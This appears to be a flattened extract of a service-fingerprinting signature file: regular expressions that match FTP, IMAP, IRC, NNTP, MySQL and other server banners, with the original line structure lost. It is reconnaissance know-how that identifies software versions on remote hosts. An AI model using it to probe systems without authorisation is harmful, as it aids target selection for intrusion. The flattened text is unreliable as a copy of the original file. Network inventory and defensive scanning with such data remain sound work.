([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n -220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n -220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n -220-FileZilla Server\r\n -431 Could not initialize SSL connection\r\n -220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n -220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n -220 AXIS (.+) FTP Network Print Server V([-\w_.]+) -220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n -220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n -220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n -220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n -220[ -]Serv-U FTP[ -]Server v([\w._-]+) -220-Serv-U FTP Server for Winsock\r\n -220-FTP Server v([\d.]+) for WinSock ready\. -431 Unable to negotiate secure command connection\.\r\n -220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n -220 JD FTP Server Ready -220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n -220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n -220 ProFTPD (\d\S+) Server -220 FTP Server \[([-\w_.]+)\]\r\n -220.*ProFTP[dD].*Server ready -220 ProFTP Server Ready\r\n -220 Welcome @ my\.ftp\.org\r\n -220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n -220 ProFTP-Server auf ([-\w_.]+)\r\n -220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) -220 FTP Server ready\.\r\n -220.*NcFTPd Server -220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready -220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd -220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n -220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS -220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n -220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n -220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users -220 Service Ready for new User\r\n -220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n -220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n -220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n -220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n -220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n -(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X -220 WinGate Engine FTP Gateway ready\r\n -220 Welcome to Quick 'n Easy FTP Server\r\n -421 Too many connections for this IP address, please try again later\.\r\n -220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n -500 OOPS: .*\r\n -500 OOPS: vsftpd: both local and anonymous access disabled!\r\n -220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n -220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n -220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n -220 CesarFTP ([\w.]+) Server Welcome !\r\n -220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n -220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n -220 netapp ftp server\r\n -220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 -220 ([\w._-]+) FTP server ready\.\.\.\r\n -220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n -220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n -220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n -220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n -220 PV11 FTP Server ready\r\n -220 Alize Session Manager FTP Server\r\n -220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n -220 DataHive FTP Server ([\d.]+) Ready\.\r\n -220 copier2FTP server ready\.\r\n -220 DrayTek FTP version ([\d.]+)\r\n -220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n -match ftp m%^220-loading\.\.\r\n220-\| W e L c O m E @ SFXP\|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\|\r\n% p/SwiftFXP/ -220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n -220 Dell Laser Printer 3100cn\r\n -220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n -220 Welcome to the dvd2xbox ftp server\.\r\n -220 Welcome To WinEggDrop Tiny FTP Server\r\n -220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n -220 wzd server ready\.\r\n -500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n -220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n -220 Connected to ([-\w_.]+) ready\.\.\.\r\n -220 NETWORK HDD FTP Server ready\.\r\n -220 Blue Coat FTP Service\r\n -220 Homer Ftp Server\r\n -220 Personal FTP Server ready\r\n -220 Golden FTP Server PRO ready v([\w._-]+)\r\n -220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 -220 AudioVAULT FTP server\r\n -220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n -220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n -220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd -220 Cisco \(([\d.]+)\) FTP server ready\r\n -220 \"Global Site Selector FTP\"\r\n -220 Willkomen auf Ihrer Dreambox\.\r\n -Error loading /etc/ssl/certs/ftpd\.pem: -220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n -220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n -220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n -220 IB-23 Ver ([\d.]+) FTP server\.\r\n -220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n -refused in\.ftpd from [-\w_.]+ logged\n -220 Xlight Server ([\d.]+) ready\.\.\. \r\n -220 FS-3820N FTP server\.\r\n -220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n -220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n -220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n -ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n -220 Canon iN-E5 FTP Print Server V([-\w_.]+) -220 FTP-Backupspace\r\n -220 zFTPServer v([-\w_.]+), build ([-\d]+) -220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n -220 FTP Server, type 'quote help' for help\r\n -550 no more people, max connections is reached\r\n -220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n -220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n -220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n -220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) -220 FTP server: Lexmark Optra LaserPrinter ready\r\n -220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n -220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n -220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n -220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) -.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n -220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) -220 Welcome to Ocean FTP Server. -220 4dftp .* FTP Service \(Version ([^)]+)\) -220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd -220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n -421 Closing non-secure connections in Secure Mode\. \r\n -220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n -220 Conti FTP Server ready\r\n -220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd -220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd -220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n -220 Welcome to the NSLU2 vsftp daemon\.\r\n -220 Star IFBD-HE05/06 FTP Server\.\r\n -220 Welcome to Baby FTP Server\r\n -220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n -220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n -220 ALFTP Server ready\. \^-\^\)/~\r\n -220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n -220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n -220 aFTPServer ready \(cwd is /\)\r\n -220 FTP version ([\w.]+)\r\n -220 pyftpdlib ([\w._-]+) ready\.\r\n -220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n -220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n -220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n -220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n -220 OpenFTPD server([^ ]+)? -220 Ftp service of Jana-Server ready\r\n -220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n -501 Proxy unable to contact ftp server\r\n -220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n -220-Sidewinder ftp proxy\. You must login to the proxy first -220 webshield2 FTP proxy ready\.\r\n -220 WinProxy \(Version ([^)]+)\) ready\.\r\n -220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n -220 Finjan SurfinGate Proxy - Server Ready\.\r\n -220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n -500 WinGate Engine Access Denied\r\n -220 IWSS FTP proxy ready\r\n -220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n -220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n -220-CCProxy FTP Service\(Unregistered\)\r\n -220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n -220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n -220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n -421 Service not available \(The FTP server is not responding\.\)\n -220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); -220-\r?\n220 - ftp -\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ -\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r -220 Fyre rendering server ready\n -\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h -HELLO_BOT\r\n -HELLO_CONTROL_SERVER\r\n -\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n -%%QU%%QU%%QU -\nClient limit exceeded\.\n -3Connection to [\d.]+ is denied -- no authorization\.\r\n -GIOP\x01...\0\0\0\0 -\x03\0\0.*@ -\xff\xfd.| p|GNU Gatekeeper -match hddtemp m=^\|= p/hddtemp hard drive info server/ -Helpdesk Advanced ([\d.]+) License Logging Service -\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 -HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

-HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} -220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n -220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 -00 -01 -\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== -IceP\x01\0\x01\0\x03\0\x0e\0\0\0 -flock\(\) on closed filehandle .*midentd -\"\0\x04\0 -IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at -\* OK GroupWise IMAP4rev1 Server Ready\r\n -\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n -\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n -\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready -\* OK IMAP4 Server \(IMail ([-.\w]+)\) -\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd -\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n -\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n -\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n -\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n -\* OK [Dd]ovecot MUA ready\r\n -\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] -\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n -\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n -\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n -\* OK AVM KEN!4 IMAP Server ready\r\n -\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n -\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n -\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n -\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n -\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) -\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n -\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n -\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n -\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n -\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu -\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n -\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n -\* OK Welcome to Binc IMAP v(\d[-.\w]+) -\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n -\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n -\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n -\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n -\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n -\* OK Softalk IMAP Server ready\r\n -\* OK Welcome to Binc IMAP -\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n -\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n -\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n -\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n -\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n -\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n -\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n -\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n -\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n -\* OK IMAP4rev1 Service at Jana-Server ready\r\n -\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n -\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n -\* OK CommuniGate Pro IMAP Server ready\r\n -\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n -\+OK X1 ([-\w_.]+)\r\n -\* OK IMAP4rev1 SmarterMail\r\n -\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n -\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n -\* OK .* GoMail V([-\w_.]+) IMAP4rev1 -\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n -\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n -\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n -\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n -\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n -\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at -\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n -\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready -\* OK Dovecot DA ready\.\r\n -\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 -\* BYE Hi This is the IMAP SSL Redirect\r\n -\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n -\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n -\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at -\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n -\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n -\* OK ([-\w_.]+) IMAP server ready\r\n -\* OK IMAP4 proxy ready\r\n -\* OK imapfront ready\. \+ stunnel\r\n -\* OK avast! IMAP Proxy\r\n -\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n -\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n -\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n -Protocol Error: XML data is not well-formed\. -\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ -\x0e\0\0\0\0\0\0 -match irc m=^NOTICE AUTH :\*\*\* Looking up your hostname\.\.\.\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* (?:Couldn't look up|Found) your hostname\r\n= p/Hybrid-based ircd/ -NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n -NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n -NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n -ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n -CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, -CAPAB START 1202\r\n -:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n -ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n -IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n -:([\w._-]+) 451 \* HELP :No te has registrado\r\n -:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n -:.*!psyBNC@lam3rz\.de NOTICE \* : -:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n -:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n -\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 -.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) -\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> -JDWP-Handshake -cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 -\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] -ksysguardd ([\d.]+)\n\(c\) -\d+ .*\n\x000 succeeded\n\0 -0 succeeded\n\0 -220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n -220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n -220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n -220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n -220 DSPAM LMTP ([-\w_.]+) Ready\r\n -\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n -LNS READY<> -0001;2 -\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 -\xc1, -\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > -MIDASd v([\w.]+) connection accepted\n\xff -\xff\0\x17Took too long to log in -merovingian:2:\w+:\n -MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r -# munin node at ([-\w_.]+)\n -MULTIPLICITYP -match mwti-rpc m=^Welcome MWTI RPC Communication Server Version ([\w._-]+) \[(?:Administrator|SYSTEM)\]\r\n= p/MWTI RPC Communication Server/ v/1/ - [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n -\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp ->>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n -.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n -\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> -\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> -[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 -\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String -\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ -VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 -.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. -.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 -.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 -.\0\0\0\xffj\x04'[\d.]+' .* MySQL -.{128}[\x46-\x53]... -200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* -Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n -netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] -\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} -\x06\x02...([\w._@-]+).. -smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n -502 You have no permission to talk\. Goodbye.\r\n -200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n -200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n -200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at -200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n -20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n -200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n -200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n -200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n -200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n -200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd -200 Hi, you can post \(sn version ([\w.]+)\)\r\n -200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n -200 Jana news server ready - posting allowed\r\n -200 NNTP server NOFFLE ([\w.]+)\r\n -502 Could not get your access name\. Goodbye\.\r\n -201 NNTP server ready \(no posting\)\r\n502 No permission\r\n -200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n -200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n -200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n -200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n -200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n -200 Service available, 